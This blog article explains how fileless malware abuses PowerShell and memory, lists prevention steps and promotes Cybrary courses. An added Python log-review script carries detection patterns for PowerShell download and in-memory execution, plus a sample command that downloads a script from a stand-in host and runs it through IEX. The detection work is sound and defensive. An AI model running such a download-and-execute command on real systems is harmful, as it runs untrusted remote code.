Finding Security Against Invisible Malware

April 26, 2018


We live in a world of possibilities! The good, the bad, and the ugly: anything can happen.

While innovators at Google are working hard to make it easy and safe for people to get around in driverless, self-driving cars, hackers are already making life difficult by breaking into computer systems and stealing personal and sensitive data using a similar logic: fileless malware.

Also called non-malware or zero-footprint malware, fileless malware has existed for many years. As hackers constantly look for deceptive ways to infiltrate and attack computer systems and networks, this sophisticated technique has become increasingly popular in recent times.

Unlike a traditional malware attack, which requires code to be written to the hard disk, a zero-footprint malware attack writes no code to disk. Instead it uses legitimate system assets and trusted processes, such as memory and PowerShell, to infect the victim's machine. Because these are highly trusted processes, most anti-virus software does not even scan them, which gives hackers an easy and convenient way to go undetected by hiding behind a trusted process. Also known as "living off the land," this approach makes an attack stealthier and more effective, and hackers are therefore increasingly using it to carry out their nefarious activities.

A recent study by the Ponemon Institute reveals that about 9% of attacks used this method in 2016, which grew to 29% in 2017 and is expected to increase to 35% in 2018, significantly raising the alert level for both individuals and businesses. Because fileless malware offers a ten times better success rate, hackers are relying on this method to attack computer networks.

With these types of security attacks on the rise, individuals and businesses need to educate themselves on the style of these attacks and the incident response options available to them.

How does a fileless malware attack take place?

After clicking on a cleverly disguised spam message, the user is taken to a webpage that downloads Flash. Flash, with its many vulnerabilities, is the preferred choice of smart hackers for infecting systems.

Hackers then use Flash to access PowerShell and, operating only from the computer's memory, send instructions through the command line to download a malicious PowerShell script, which collects sensitive data and sends it back to the attacker.

Symptoms of a fileless malware attack

Without a file installed on the computer, even traditional security tools may find it difficult to detect fileless malware. However, an infected computer or network does show some warning signs, including weird network behavior and attempts to connect to botnet servers.

Safeguards against Zero footprint malware attacks

Prevention is better than cure, and identifying an attack in its early stages may help mitigate the risk. Here are some steps that help prevent an attack or reduce the damage if one occurs.

  • Because hackers use existing system resources to attack your computer, disabling those systems and processes when they are not in use is an option. Disable PowerShell, macros, and Windows Management Instrumentation if you are not using them.
  • Always keep software and patches current and up to date.
  • Constantly monitor security, network, and activity logs.
  • Grant privileges and access carefully, and only to credible users.
  • Monitor the system's behavior patterns regularly.
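The log-monitoring step can be made concrete for the chain described above, where a browser-hosted component starts PowerShell to fetch and run a script in memory. The following is an added example, not code from the original article: it reviews process-creation events whose field names follow Sysmon Event ID 1 (`Image`, `CommandLine`, `ParentImage`). The parent list, the trait names, the alert threshold, and the sample events are all assumptions constructed for illustration.

```python
import json
import re
from ntpath import basename  # parses Windows paths on any OS
# Assumption: programs that rarely have a legitimate reason to start PowerShell.
SUSPECT_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "winword.exe", "excel.exe"}
DOWNLOAD = re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression", re.I)

def is_flag(token, full_name):
    """True if token abbreviates -<full_name> the way PowerShell allows (-enc, -w)."""
    name = token[1:].lower()
    return token[:1] in ("-", "/") and bool(name) and full_name.startswith(name)

def traits(command_line):
    """Return the fileless-style traits found in one PowerShell command line."""
    found, tokens = set(), command_line.split()
    for i, tok in enumerate(tokens):
        if is_flag(tok, "encodedcommand") or tok.lower() == "-ec":
            found.add("encoded_command")
        if is_flag(tok, "windowstyle") and [t.lower() for t in tokens[i + 1:i + 2]] == ["hidden"]:
            found.add("hidden_window")
    if DOWNLOAD.search(command_line):
        found.add("network_download")
    if IN_MEMORY.search(command_line):
        found.add("in_memory_execution")
    return found

def review(log_lines):
    """Return (parent, reasons) for each PowerShell launch that deserves a closer look."""
    alerts = []
    for line in log_lines:
        ev = json.loads(line)
        if basename(ev["Image"]).lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = traits(ev["CommandLine"])
        parent = basename(ev["ParentImage"]).lower()
        if parent in SUSPECT_PARENTS:
            reasons.add("unexpected_parent")
        if "unexpected_parent" in reasons or len(reasons) >= 2:
            alerts.append((parent, sorted(reasons)))
    return alerts

# Constructed sample events, one JSON object per line (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [json.dumps({"Image": PS, "CommandLine": c, "ParentImage": p}) for c, p in [
    ("powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"", r"C:\Program Files\Internet Explorer\iexplore.exe"),
    (r"powershell.exe -File C:\Scripts\backup.ps1", r"C:\Windows\System32\svchost.exe"),
    ("powershell.exe -w hidden -enc <base64 elided>", r"C:\Windows\System32\cmd.exe"),
]]
```

Calling `review(SAMPLE_LOG)` flags the browser-spawned launch and the hidden, encoded launch, and leaves the scheduled backup script alone. The parent list and the two-trait threshold need tuning to what is normal in a given environment.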

Cybersecurity experts at Cybrary, an open-source cyber-security and IT certification preparation platform, offer free education on malware analysis and incident response options available in the event of an attack. Here is a list of courses on understanding malware and incident response handling.

  1. Dynamic Malware Analysis
  2. Intro to Malware Analysis and Reverse Engineering
  3. Incident Response and Advanced Forensics
